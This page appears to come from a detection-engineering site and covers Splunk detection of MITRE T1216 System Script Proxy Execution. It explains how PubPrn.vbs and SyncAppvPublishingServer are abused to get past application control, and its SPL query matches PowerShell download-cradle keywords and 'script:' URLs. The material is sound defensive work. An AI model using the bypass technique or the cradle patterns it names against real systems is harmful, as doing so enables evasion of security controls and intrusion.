T1216 Splunk · SPL

Detect System Script Proxy Execution in Splunk

Adversaries may use trusted scripts, often signed with Microsoft certificates, to proxy the execution of malicious files. Several Microsoft-signed scripts that ship with Windows or are downloadable from Microsoft can be abused to proxy execution of attacker-controlled content. Primary sub-techniques include PubPrn.vbs (a printer publishing script that accepts a 'script:' COM scriptlet URL as its second argument) and SyncAppvPublishingServer.vbs/exe (an App-V publishing script that passes arguments directly to a PowerShell pipeline). Because these scripts are signed by Microsoft, they may bypass application control policies (AppLocker, WDAC) that trust Microsoft-signed content, and they evade script-based detection that focuses on unsigned or unknown interpreters. The technique falls under Defense Evasion, making it a common component of initial access payloads and post-exploitation tooling.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1216 System Script Proxy Execution
Canonical reference
https://attack.mitre.org/techniques/T1216/

SPL Detection Query

Splunk (SPL)
spl 
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(
  (Image="*\\cscript.exe" OR Image="*\\wscript.exe")
  AND (CommandLine="*pubprn.vbs*" OR CommandLine="*syncappvpublishingserver.vbs*")
)
OR
(
  Image="*\\syncappvpublishingserver.exe"
  AND (
    CommandLine="*Start-Process*" OR CommandLine="*Invoke-Expression*" OR
    CommandLine="*IEX*" OR CommandLine="*Net.WebClient*" OR
    CommandLine="*DownloadString*" OR CommandLine="*-enc*" OR
    CommandLine="*-EncodedCommand*" OR CommandLine="*cmd.exe*"
  )
)
| eval ProxyScript=case(
    match(lower(CommandLine), "pubprn\.vbs"), "PubPrn",
    match(lower(CommandLine), "syncappvpublishingserver\.vbs"), "SyncAppvPublishingServer.vbs",
    match(lower(Image), "syncappvpublishingserver\.exe"), "SyncAppvPublishingServer.exe",
    true(), "Unknown"
  )
| eval ScriptletExec=if(match(lower(CommandLine), "(script:|scrobj\.dll|scriptlet)"), 1, 0)
| eval RemoteURL=if(match(CommandLine, "https?://"), rex(CommandLine, field=CommandLine, mode=sed, "s/.*(https?://[^\s'""]+).*/\1/"), "none")
| eval SuspicionScore=0
| eval SuspicionScore=SuspicionScore + if(ScriptletExec=1, 3, 0)
| eval SuspicionScore=SuspicionScore + if(match(lower(CommandLine), "https?://"), 2, 0)
| eval SuspicionScore=SuspicionScore + if(match(lower(CommandLine), "(invoke-expression|iex|downloadstring|net\.webclient|-encodedcommand)"), 2, 0)
| eval SuspicionScore=SuspicionScore + if(NOT match(lower(ParentImage), "(explorer\.exe|services\.exe|svchost\.exe|msiexec\.exe)"), 1, 0)
| where SuspicionScore > 0
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, ProxyScript, ScriptletExec, RemoteURL, SuspicionScore
| sort - _time
high severity high confidence

Detects System Script Proxy Execution via Sysmon Event ID 1. Matches cscript/wscript executing PubPrn.vbs or SyncAppvPublishingServer.vbs, and SyncAppvPublishingServer.exe invoked with PowerShell-style arguments. Assigns a suspicion score based on scriptlet protocol usage (+3), remote URLs (+2), PowerShell download cradle patterns (+2), and unexpected parent processes (+1). Higher scores indicate higher-confidence malicious proxy execution versus legitimate administrative use.

Data Sources

Process: Process CreationCommand: Command ExecutionSysmon Event ID 1

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Legitimate printer publishing operations using PubPrn.vbs invoked against internal print server IP addresses (not remote HTTP URLs) — verify second argument is a UNC path or IP, not a 'script:' URL
  • App-V publishing refresh jobs running SyncAppvPublishingServer.vbs on schedule — confirm parent is taskeng.exe or svchost.exe for the Task Scheduler service with a known task name
  • IT automation or MDM deployment scripts that invoke Microsoft-signed VBScripts via cscript during software packaging — parent process will typically be msiexec.exe, ccmexec.exe, or a vendor installer
  • Security product health checks or compliance scanners that enumerate signed scripts by executing them with benign arguments
Download portable Sigma rule (.yml)

Other platforms for T1216

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1PubPrn.vbs Scriptlet Execution via script: Protocol

    Expected signal: Sysmon Event ID 1: Process Create with Image=cscript.exe, CommandLine containing 'pubprn.vbs' and 'script:http://127.0.0.1'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:8080 from cscript.exe. Security Event ID 4688 if command line auditing is enabled.

  2. Test 2SyncAppvPublishingServer.vbs PowerShell Pipeline Injection

    Expected signal: Sysmon Event ID 1: cscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and 'Write-Output'. Child process Sysmon Event ID 1: powershell.exe spawned by cscript.exe executing the injected command. Sysmon Event ID 11: File Create for t1216-test.txt in %TEMP%.

  3. Test 3SyncAppvPublishingServer.exe Direct Invocation with PowerShell Download Cradle

    Expected signal: Sysmon Event ID 1: SyncAppvPublishingServer.exe with CommandLine containing 'Invoke-Expression' and 'Net.WebClient'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:9090. Security Event ID 4688 with full command line.

  4. Test 4PubPrn.vbs Used from Non-Standard Location (Bypass Detection by Path)

    Expected signal: Sysmon Event ID 11: File Create for pubprn.vbs in %TEMP% (potential staging artifact). Sysmon Event ID 1: cscript.exe with CommandLine referencing %TEMP%\pubprn.vbs and the 'script:' URL. Sysmon Event ID 3: Network Connection attempt from cscript.exe.

Last updated: 2026-04-13 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1216 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Sub-techniques (2)

Related Techniques

T1216.001PubPrnT1216.002SyncAppvPublishingServerT1218System Binary Proxy ExecutionT1218.005MshtaT1218.011Rundll32T1059.005Visual BasicT1059.001PowerShellT1105Ingress Tool TransferT1027Obfuscated Files or Information

Same Tactic: Defense Evasion

Popular Detections